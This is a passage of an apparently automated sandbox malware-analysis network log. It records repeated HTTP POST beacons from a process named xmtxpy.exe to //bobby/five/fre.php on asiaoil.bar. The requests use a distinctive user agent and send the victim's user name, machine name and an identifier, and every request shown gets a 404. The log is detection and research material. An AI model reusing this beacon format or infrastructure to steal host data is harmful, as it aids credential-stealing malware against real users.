                        Feb 10, 2022 10:22:22.506509066 CET345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:22.588881016 CET345INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IYa8QLbJBtkMewci%2Fy3c8YjBFq4dsPE33C%2B67GR4NBQNLJZRdPOw48%2FtcUb%2BG8a9XxJsc%2FLHxAkXJbNtsVOHlmNJ8KgW%2BxJlAyE6l%2FjEcOW2fEoq4xgfX4aQ5RZPHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445ca9c095c5c-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.2249167172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:02.840347052 CET314OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 176
                        Connection: close
                        Feb 10, 2022 10:22:02.856580973 CET314OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.ruAlbus704672ALBUS-PC+0DE4229FCF97F5879F50F8FD3dFvzt
                        Feb 10, 2022 10:22:02.975469112 CET315INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4454fc86b917d-FRA
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        20192.168.2.2249185104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:23.504559040 CET346OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:23.520739079 CET346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:23.595321894 CET347INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sM0ogIKfjYVzx%2F54CqSfhjTPc7gH6ECGRuTp6F6Pr791MX1PGLDWaUif41h1edR%2Bl8fsnqA1lYGZ15EqZyjj3xPhB0TdXiYdmWCIYNqlsiw0OjpK0OItnrzqYCRU8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445d0fcca9217-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        21192.168.2.2249186104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:24.588293076 CET348OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:24.604518890 CET348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:24.674747944 CET349INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=16XyyasiijTs3mtooXtiXEBC3sVd%2FX3IpmrXnVgvAF7rYQXutsuLPMsIWRmqeVqbfgT1uHpXHgFEG6cA94%2Bl1vC5elQ%2F7riyngPQJHQv7Taa1Xkm5yxHj1vPsREEwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445d7baaa91f3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        22192.168.2.2249187172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:25.593017101 CET350OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:25.609266043 CET350OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:25.698025942 CET351INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZXOqBbo1prOUCtgEa8VHKBOX3aiUpw4bwcinIO5LwxwVfvhzB3YO83i0Uy1VUFZYvJDn%2BFVM2Qbb2QX9GH1gNr8iN7INb%2BqvuODkDJIVQrU84Oc3fT4Y6qVHDQFlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445ddfbe390f4-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        23192.168.2.2249188172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:26.671474934 CET351OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:26.687769890 CET352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:26.773804903 CET352INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445e4bcca91ed-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        24192.168.2.2249189172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:27.690156937 CET353OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:27.707482100 CET353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:27.795358896 CET354INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445eb1e9f9189-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        25192.168.2.2249190172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:29.085941076 CET355OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:29.102108955 CET355OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:29.188222885 CET356INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445f3db6a5b3e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        26192.168.2.2249191172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:30.799654961 CET357OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:30.818408966 CET357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:30.894473076 CET358INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445fe9dc491ed-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        27192.168.2.2249192172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:31.879954100 CET359OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:31.897677898 CET359OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:31.985625029 CET359INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446054d3a9274-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        28192.168.2.2249193172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:32.951127052 CET360OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:32.967331886 CET361OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:33.053421974 CET361INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4460bfe8a9168-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        29192.168.2.2249194172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:34.006464005 CET362OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:34.022774935 CET362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:34.138065100 CET363INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461298c49180-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.2249168172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:03.831670046 CET316OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:03.848067045 CET316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:03.955466986 CET317INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44555fbc890ee-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        30192.168.2.2249195172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:35.055712938 CET364OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:35.072159052 CET364OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:35.142774105 CET365INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461928579004-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        31192.168.2.2249196172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:36.072597980 CET366OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:36.088974953 CET366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:36.184967995 CET367INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461f7a6a9079-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        32192.168.2.2249197172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:37.120242119 CET367OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
